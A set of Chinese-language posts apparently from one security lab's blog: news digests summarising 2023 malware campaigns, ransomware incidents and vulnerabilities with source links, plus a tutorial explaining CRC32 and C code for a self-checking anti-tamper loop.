Stealer恶意软件 https://thehackernews.com/2023/04/youtube-videos-distributing-aurora.html Aurora是一种基于Go的信息窃取程序，于2022年底出现在威胁领域，通过YouTube视频和SEO准备的虚假破解软件下载网站进行分发。单击YouTube视频描述中的链接会将受害者重定向到诱饵网站，在这些网站上，他们会被诱使在看似合法的程序外衣下下载恶意软件。 7、2022年澳大利亚因诈骗损失31亿美元 https://www.bleepingcomputer.com/news/security/australians-lost-a-record-31-billion-to-scams-last-year/ 澳大利亚竞争与消费者委员会 (ACCC) 表示，2022 年澳大利亚人因诈骗损失了创纪录的31亿美元，比2021年记录的总损失增加了 80%。大多数损失与投资诈骗有关，损失达15亿美元，其次是远程访问诈骗，造成2.29亿美元的损失，以及支付重定向诈骗，受害者又损失了2.24亿美元。 8、美国电信巨头CommScope遭勒索软件攻击，数万员工数据在暗网泄露 https://www.freebuf.com/news/364073.html 美国大型电信和IT基础设施巨头CommScope证实，在3月份遭到勒索软件攻击，该攻击导致员工数据和公司文件被泄露。目前，Vice Society勒索团伙声称已经在该组织的暗网上公布了在此次攻击中被盗的大量CommScope员工数据 9、iOS 17 将支持应用侧载以遵守欧盟监管规定 https://www.solidot.org/story?sid=74696 苹果将在 iOS 17 中首次加入对应用侧载（sideloading）的支持，允许 iOS 用户安装从官方商店 App Store 之外下载的应用。 10、新型 QBot 电子邮件攻击利用 PDF 和 WSF传播恶意软件 https://www.bleepingcomputer.com/news/security/new-qbot-email-attacks-use-pdf-and-wsf-combo-to-install-malware/ 从4月开始，安全研究人员正记录一种新型 Qbot 电子邮件攻击——下载 Windows 脚本文件 (WSF) 以在受害者设备上安装 Qbot 的 PDF 附件。 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

1、8220组织利用Log4Shell漏洞安装挖矿程序 https://asec.ahnlab.com/ko/51362/ 安全公司发现8220 Gang攻击组织正在利用VMware Horizo​​n服务器上的 Log4Shell漏洞安装挖矿程序。由于许多在运行的系统存在漏洞且未进行漏洞修补，因此正成为众多攻击者的攻击目标。Log4Shell (CVE-2021-44228) 是基于Java日志实用程序Log4j的一个漏洞。 2、以色列黑客间谍公司QuaDream将关闭 https://www.hackread.com/quadream-israeli-iphone-hacking-spyware-shut-down/ QuaDream 总部位于以色列拉马特甘，拥有约 40 名员工，以其用于入侵iPhone的间谍软件而闻名。最近因开发了可以破解iPhone的间谍软件被Citizen Lab和微软曝光。据透露，该公司近期计划将解雇大部分员工并关闭其业务，只保留一小部分人员来监督业务关闭。 3、APT组织Gamaredon被指对乌克兰发起网络钓鱼活动 https://blog.eclecticiq.com/exposed-web-panel-reveals-gamaredon-groups-automated-spear-phishing-campaigns EclecticIQ研究人员发现了针对乌克兰政府实体的鱼叉式网络钓鱼活动，并确定了一个公开暴露的简单邮件传输协议 (SMTP) 服务器。SMTP服务器包含一个网页面板，旨在创建和分发鱼叉式网络钓鱼电子邮件。在SMTP服务器配置中发现的观察其策略、技术和程序 (TTP)、受害者学和基础设施与之前识别的Gamaredon活动重叠。Gamaredon APT组织被认为是俄罗斯国家支持的威胁 4、Apache Solr代码执行漏洞安全风险通告 https://www.secrss.com/articles/53770 近日，奇安信CERT监测到 Apache Solr 代码执行漏洞，Apache Solr 默认配置下存在服务端请求伪造漏洞。 5、NSO Group 在 2022 年至少使用了三个 iOS 零点击漏洞 https://www.securityweek.com/nso-group-used-at-least-3-ios-zero-click-exploits-in-2022-citizen-lab/ 根据 Citizen Lab 的一份新报告，以色列间谍软件供应商 NSO Group 在 2022 年至少使用了三个以前未知的 iOS 零点击漏洞。 6、Dark.IoT僵尸网络滥用ClouDNS与白域名进行C2通讯 https://www.secrss.com/articles/53859 ark.IoT 在沉寂了一段时间后，开始了新一轮的更新与传播，其中更是滥用 DNS 托管服务商来与白域名进行 C2 通讯。 7、网络安全专家暂时中断了 RedLine Stealer 的操作 https://securityaffairs.com/144974/cyber-crime/experts-temporary-distrupted-redline-stealer-op.html 研究人员发现恶意软件控制面板使用 GitHub 存储库作为 dead-drop 解析器。ESET 研究人员宣布在 GitHub 的帮助下暂时中断了RedLine Stealer的运行。 8、新的 Chameleon Android 恶意软件模仿银行、政府和加密应用程序 https://www.bleepingcomputer.com/news/security/new-chameleon-android-malware-mimics-bank-govt-and-crypto-apps/ 移动恶意软件是由网络安全公司 Cyble 发现的，该公司报告称通过受感染的网站、Discord 附件和 Bitbucket 托管服务进行分发。 9、Black Basta 声称它正在出售被盗的 Capita 数据 https://www.theregister.com/2023/04/18/capita_breach_gets_worse/ Black Basta 声称是最近入侵 Capita 的勒索者，据报道他们正在出售敏感信息，包括从 IT 外包巨头那里窃取的银行账户信息、地址和护照照片。 10、随着威胁行为者利用新的 AI 工具，网络钓鱼攻击激增 https://www.infosecurity-magazine.com/news/phishing-surge-threat-actors-ai/ 根据零信任安全供应商 Zscaler 的 ThreatLabz 网络钓鱼报告，与 2021 年相比，2022 年全球网络钓鱼活动增加了近 50%，部分原因是威胁行为者可以使用网络钓鱼工具包和新的人工智能工具。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。

CRC介绍 在玩某些游戏，例如fps类游戏时，你想要修改某些特定的数值实现一些功能，这时你很有可能会被查封账号甚至禁封机器码。因为你更改了游戏中的数据，从而导致接收方收到”错误的数据“。为尽量提高接收方收到数据的正确率，在接收数据之前需要对数据进行差错检测，这种检测就是我们所说的CRC检测。 CRC也叫循环冗余校验码，它属于密码学一类算法，常用于数据校验，一般会用来检测程序是否被脱壳或者被修改，以达到防破解的目的。CRC运算实际上就是将数据k进行模2运算，得到余数n，然后将n拼接到k的后面生成k+n为循环冗余校验码的字长。接着发送k+n到接收方作为被除数进行模2运算，判断余数是否为0，如果余数非0则CRC检测出数据被修改了。简单点说，就是把需要校验的数据与生成多项式进行循环异或处理。 PS： 1.发送方和接受方会约定一个特定的除数，它是一个定值，我们也叫除数为生成多项式。 2.在计算余数时，被除数也就是数据k需要进行补0，补0个数为生成多项式长度-1个0。 3.余数长度一定与补零的长度一致 流程图： 讲了这么多不如来个例子好理解 例子1：这里数据为1110101，生成多项式为101，那么我们要传给接收方的数据就为1110101（数据）+10（余数）=111010110 这个就是CRC的计算原理了 CRC计算的两种方式 1.直接计算法 这里我们通过例子来讲解，例子2： 首先我们看到这里的生成项是1101，然后在计算中的除数（蓝色字体标记）大多是1101而有时是0000，当除数为1101时被除数的首位都是1，而首位不为1时就是0000。那么我们不妨做个假设，既然被除数和除数的首位为1时会被消掉那么我们就不需要四位异或了，改成三位异或，三位异或的话被除数一次就取三个，而除数取后三个，当被除数首位为1时就左移一位让新的三位与除数（生成项）的后三位进行异或；当被除数移出位是0时就异或000，然后不断重复此步骤直至结束。（这里是针对本例题的，当你的生成项为n时，你就取n-1位异或） 那么就会有人问到底需要重复几次才算结束呢？ 处理次数=待处理数据位数（被除数位数）=商的位数（本题次数为6次） 例如本题第一次被除数取100，左移一位得001然后与101异或得100。100左移一位得000然后与101异或得101。101左移一位得010然后与101异或得111。111左移一位得110然后与101异或得011。011左移一位得110然后与000异或得110（与000异或值是不变的）。110左移一位得100然后与101异或得001得到余数刚好6次。 2.驱动表法 驱动表法没有直接计算法得直观，但是效率却比直接计算法要高那么如何实现呢？我们知道直接计算法是一步一步从上往下来异或得到得结果，在算得过程中会有异或许多生成项，而生成项又是不变的，那么是不是可以提前计算出与数据前几位符合的生成项之和然后再异或呢？ 那么我们就将0000 0000 ~ 1111 1111这个范围的所有生成项计算出来存储为表格，计算的时候取数据的首字节进行索引找到表中对应生成项异或的和与去掉首字节的数据进行异或就行了。 表的形成 终于过度到表了，这里我们来用算法实现表，让你清楚明白它的原理，这里我们拿CRC32表的形成举例首先得了解一下CRC32的生成项是什么 想要了解更多的CRC以及它的生成多项式可以去这里看：http://www.ip33.com/crc.html #include <windows.h> #include <stdio.h> int main() {    DWORD crc;    for (DWORD i = 0; i < 256; i++)//256个元素   {        crc = i;        for (DWORD k = 0; k < 8; k++)//因为这里异或是从数据的高位开始，所以需要计算的数据左移8位，这里就需要计算8次       {            if (crc & 1)//判断最高位是否为1                crc = (crc >> 1) ^ 0xEDB88320;//最高位为1，右移一位，然后与0xEDB88320异或              else                crc = crc >> 1;//最高位为0时，不用异或，整体数据右移一位。相当于例子2中110与000异或值是不变的       }        printf ("0x%08x, ", crc);        if (((i+1)%6) == NULL )            printf ("\n");   } } /*CRC32表 0x00000000, 0x77073096, 0xee0e612c, 0x990951ba, 0x076dc419, 0x706af48f, 0xe963a535, 0x9e6495a3, 0x0edb8832, 0x79dcb8a4, 0xe0d5e91e, 0x97d2d988, 0x09b64c2b, 0x7eb17cbd, 0xe7b82d07, 0x90bf1d91, 0x1db71064, 0x6ab020f2, 0xf3b97148, 0x84be41de, 0x1adad47d, 0x6ddde4eb, 0xf4d4b551, 0x83d385c7, 0x136c9856, 0x646ba8c0, 0xfd62f97a, 0x8a65c9ec, 0x14015c4f, 0x63066cd9, 0xfa0f3d63, 0x8d080df5, 0x3b6e20c8, 0x4c69105e, 0xd56041e4, 0xa2677172, 0x3c03e4d1, 0x4b04d447, 0xd20d85fd, 0xa50ab56b, 0x35b5a8fa, 0x42b2986c, 0xdbbbc9d6, 0xacbcf940, 0x32d86ce3, 0x45df5c75, 0xdcd60dcf, 0xabd13d59, 0x26d930ac, 0x51de003a, 0xc8d75180, 0xbfd06116, 0x21b4f4b5, 0x56b3c423, 0xcfba9599, 0xb8bda50f, 0x2802b89e, 0x5f058808, 0xc60cd9b2, 0xb10be924, 0x2f6f7c87, 0x58684c11, 0xc1611dab, 0xb6662d3d, 0x76dc4190, 0x01db7106, 0x98d220bc, 0xefd5102a, 0x71b18589, 0x06b6b51f, 0x9fbfe4a5, 0xe8b8d433, 0x7807c9a2, 0x0f00f934, 0x9609a88e, 0xe10e9818, 0x7f6a0dbb, 0x086d3d2d, 0x91646c97, 0xe6635c01, 0x6b6b51f4, 0x1c6c6162, 0x856530d8, 0xf262004e, 0x6c0695ed, 0x1b01a57b, 0x8208f4c1, 0xf50fc457, 0x65b0d9c6, 0x12b7e950, 0x8bbeb8ea, 0xfcb9887c, 0x62dd1ddf, 0x15da2d49, 0x8cd37cf3, 0xfbd44c65, 0x4db26158, 0x3ab551ce, 0xa3bc0074, 0xd4bb30e2, 0x4adfa541, 0x3dd895d7, 0xa4d1c46d, 0xd3d6f4fb, 0x4369e96a, 0x346ed9fc, 0xad678846, 0xda60b8d0, 0x44042d73, 0x33031de5, 0xaa0a4c5f, 0xdd0d7cc9, 0x5005713c, 0x270241aa, 0xbe0b1010, 0xc90c2086, 0x5768b525, 0x206f85b3, 0xb966d409, 0xce61e49f, 0x5edef90e, 0x29d9c998, 0xb0d09822, 0xc7d7a8b4, 0x59b33d17, 0x2eb40d81, 0xb7bd5c3b, 0xc0ba6cad, 0xedb88320, 0x9abfb3b6, 0x03b6e20c, 0x74b1d29a, 0xead54739, 0x9dd277af, 0x04db2615, 0x73dc1683, 0xe3630b12, 0x94643b84, 0x0d6d6a3e, 0x7a6a5aa8, 0xe40ecf0b, 0x9309ff9d, 0x0a00ae27, 0x7d079eb1, 0xf00f9344, 0x8708a3d2, 0x1e01f268, 0x6906c2fe, 0xf762575d, 0x806567cb, 0x196c3671, 0x6e6b06e7, 0xfed41b76, 0x89d32be0, 0x10da7a5a, 0x67dd4acc, 0xf9b9df6f, 0x8ebeeff9, 0x17b7be43, 0x60b08ed5, 0xd6d6a3e8, 0xa1d1937e, 0x38d8c2c4, 0x4fdff252, 0xd1bb67f1, 0xa6bc5767, 0x3fb506dd, 0x48b2364b, 0xd80d2bda, 0xaf0a1b4c, 0x36034af6, 0x41047a60, 0xdf60efc3, 0xa867df55, 0x316e8eef, 0x4669be79, 0xcb61b38c, 0xbc66831a, 0x256fd2a0, 0x5268e236, 0xcc0c7795, 0xbb0b4703, 0x220216b9, 0x5505262f, 0xc5ba3bbe, 0xb2bd0b28, 0x2bb45a92, 0x5cb36a04, 0xc2d7ffa7, 0xb5d0cf31, 0x2cd99e8b, 0x5bdeae1d, 0x9b64c2b0, 0xec63f226, 0x756aa39c, 0x026d930a, 0x9c0906a9, 0xeb0e363f, 0x72076785, 0x05005713, 0x95bf4a82, 0xe2b87a14, 0x7bb12bae, 0x0cb61b38, 0x92d28e9b, 0xe5d5be0d, 0x7cdcefb7, 0x0bdbdf21, 0x86d3d2d4, 0xf1d4e242, 0x68ddb3f8, 0x1fda836e, 0x81be16cd, 0xf6b9265b, 0x6fb077e1, 0x18b74777, 0x88085ae6, 0xff0f6a70, 0x66063bca, 0x11010b5c, 0x8f659eff, 0xf862ae69, 0x616bffd3, 0x166ccf45, 0xa00ae278, 0xd70dd2ee, 0x4e048354, 0x3903b3c2, 0xa7672661, 0xd06016f7, 0x4969474d, 0x3e6e77db, 0xaed16a4a, 0xd9d65adc, 0x40df0b66, 0x37d83bf0, 0xa9bcae53, 0xdebb9ec5, 0x47b2cf7f, 0x30b5ffe9, 0xbdbdf21c, 0xcabac28a, 0x53b39330, 0x24b4a3a6, 0xbad03605, 0xcdd70693, 0x54de5729, 0x23d967bf, 0xb3667a2e, 0xc4614ab8, 0x5d681b02, 0x2a6f2b94, 0xb40bbe37, 0xc30c8ea1, 0x5a05df1b, 0x2d02ef8d */ 注意这里用红色标识的右移，这里如果按照直接计算法来说不应该是要左移吗，为什么又右移了呢？ 注意看这个表的倒数第二个，CRC32，它的输入和输出都是需要进行反转的，也就是相当于逆向，我们就要将左移修改成右移 当然还会有人问它的多项式不应该是0x04C11DB7吗，怎么又变成了0xEDB88320了呢？ 这是它是因为0xEDB88320是0x04C11DB7的反转。这个表的生成很简单，一般是用的是0xEDB88320这个反转多项式，假如用0x04C11DB7这个正常多项式则必须还要交换位，显然会很麻烦。 做一个CRC的检测程序 相信大家差不多能够理解CRC实现的大概过程了，前面主要是对CRC大致了解，而我们真正需要深入了解的是CRC32。CRC32常用于游戏以及一些 ARJ、LHA等压缩工具软件，那么接下来我们来写一个CRC32的检测程序。 #include <windows.h> #include <stdio.h> DWORD crc32_table[256]; void CRC32_Table() {    DWORD crc;    //DWORD crc32_table[256];    for (int i = 0; i < 256; i++)   {        crc = i;        for (DWORD k = 0; k < 8; k++)       {            if (crc & 1)                crc = (crc >> 1) ^ 0xEDB88320;            else                crc >>= 1;       }        crc32_table[i] = crc; //生成并存储CRC32数据表   } } //根据CRC32表计算CRC校验码 DWORD Check_CRC32(DWORD crc, PUCHAR Data, DWORD len) {    crc = 0xFFFFFFFF; //将CRC初始化为-1    CRC32_Table();    for (DWORD i = 0; i < len; i++)   {        crc = (crc >> 8) ^ crc32_table[(crc ^ Data[i]) & 0xff];   }    return ~crc;//输出的反转 } int main() {    SetConsoleTitle("CRC32检测器");    printf("开始检测");    //初始内存校验值    DWORD Original_CRC32 = Check_CRC32(0, (PUCHAR)0x400000, 0x112000);    while (1)   {        //CRC循环校验实现实时检测        DWORD Cycle_CRC32 = Check_CRC32(0, (PUCHAR)0x400000, 0x112000);//这里第二个参数是基址，第三个个参数是一个校验的范围，也就是程序主模块镜像大小。        if (Cycle_CRC32 != Original_CRC32)       {            MessageBoxA(NULL, "已检测到您修改了代码！", "警告", MB_YESNO);       }        //为了防止频繁弹出信息框，这里使用的Sleep函数控制检测的周期，每5s弹出一次        Sleep(5000);   }    getchar(); } 这里初始化是因为待测数据的内容和长度是随机的，如果寄存器初始值为 0，那么待测字节是1字节的0x00，与待测字节是 N 字节的 0x00，计算出来的CRC32值都是0，那 CRC 值就没有意义了！所以寄存器用0xFFFFFFFF 进行初始化，就可以避免这个问题了 我这里的文件大小对应的是主模块镜像大小 实践是否能成功 这里我们用CE进行数据的修改 这里我们先手动添加地址，然后再将数值进行更改，我这里是改成了11111，然后过了5秒就弹出了警告。可以看出这个检测程序成功了！ 当然有些有点基础的人会问，CRC不是检测代码的吗，为什么这里你修改的是数值也可以检测呢？ 因为CRC是在代码段中进行操作实现的，在内存中数据根代码没有实质性的区别。

1、BlackBit勒索软件在韩国蔓延 https://asec.ahnlab.com/ko/51272/ AhnLab安全应急响应中心（ASEC）发现正在分发伪装成svchost.exe的BlackBit勒索软件。通过检查ASEC内部基础设施，确认BlackBit勒索软件从去年9月左右开始传播一直现在。BlackBit 勒索软件使用 .Net Reactor 来混淆代码，据推测这会阻碍分析。实际运行的勒索软件可以确认类似于LokiLocker勒索软件的特征，安全公司对其进行了综合分析。 2、JNPR公司修补关键的第三方组件漏洞 https://www.securityweek.com/juniper-networks-patches-critical-third-party-component-vulnerabilities/ 网络、云和网络安全解决方案提供商 Juniper Networks 发布了公告，详细介绍了在其产品组合中发现的数十个漏洞，包括Junos OS和STRM的第三方组件中的错误，其中严重的漏洞可能导致，命令注入和代码执行，以及被利用来绕过现有的防火墙规则和限制等问题。 当前该公司没有提到任何这些漏洞被利用于恶意攻击的实例。 3、新的 QBot 活动利用被劫持的企业电子邮件传播恶意软件 4 月初，卡巴斯基专家观察到QBot恶意软件攻击（又名Qakbot、QuackBot 和Pinkslipbot）的攻击激增。QBot 自 2008 年以来一直活跃，它被威胁行为者用来从受害者那里收集浏览数据和银行凭证以及其他财务信息。 4、黑客从西部数据窃取到了 10 TB 数据 https://www.solidot.org/story?sid=74667 数据存储巨头西部数据本月初证实它在 3 月 26 日遭到入侵，但没有透露更多信息。现在参与发动此次攻击的一名黑客公开接受采访，披露了更多相关信息。 5、网络攻击致使德国药物研发巨头生产延误 https://www.secrss.com/articles/53733 德国药物研发巨头 Evotec 遭受网络攻击，目前正努力恢复被迫离线的 IT 系统，Evotec 公司拥有 4200 多名员工，2021 年通过开发治疗阿尔茨海默症、亨廷顿舞蹈症等疾病的药物实现了近 7 亿美元收入。 6、成立黑客政策委员会，谷歌出台全新网络安全计划 https://thehackernews.com/2023/04/google-launches-new-cybersecurity.html 4 月 14 日，谷歌正式公布了一系列举措，专门针对目前漏洞管理生态系统的不足，出台一些更透明度的制度和措施。 7、FIN7 和 Ex-Conti 网络犯罪团伙联手发起 Domino 恶意软件攻击 https://thehackernews.com/2023/04/fin7-and-ex-conti-cybercrime-gangs-join.html 由可能隶属于 FIN7 网络犯罪集团的威胁行为者开发的一种新型恶意软件已被现已解散的 Conti 勒索软件团伙的成员使用，表明这两个团队之间存在合作。 8、Remcos RAT恶意活动针对美国报税公司 https://securityaffairs.com/144851/cyber-crime/remcos-rat-tax-day-campaign.html 在美国纳税日之前，Microsoft观察到针对美国会计和报税准备公司的新Remcos RAT活动。网络钓鱼攻击始于2023年2月。Remcos是一款由BreakingSecurity公司开发的合法远程监控软件。2021年CISA将Remcos添加到顶级恶意软件变种列表中。最近的活动专门针对处理税务准备、金融服务、注册会计师和会计师事务所以及处理簿记和税务的专业服务公司的组织。 9、Chrome V8类型混淆漏洞 (CVE-2023-2033) 已被在野利用 https://www.secrss.com/articles/53814 Google Chrome V8类型混淆漏洞(CVE-2023-2033)被在野利用，攻击者可通过诱导用户打开恶意链接来利用此漏洞，从而在应用程序上下文中执行任意代码。目前，此漏洞已检测到在野利用。 10、美国海军通过战略转型实现网络防御现代化 https://www.secrss.com/articles/53805 美国海军网络防御作战司令部（NCDOC）指挥官克里斯蒂娜·希克斯及海军网络防御作战司令部前行动主管布兰登·坎贝尔联合撰文称，美国海军在新冠疫情期间大胆转型，改变操作、保卫和防御数据的方式，实现了网络防御现代化。 免责声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景网安实验室观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景网安实验室无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景网安实验室一律不予承担。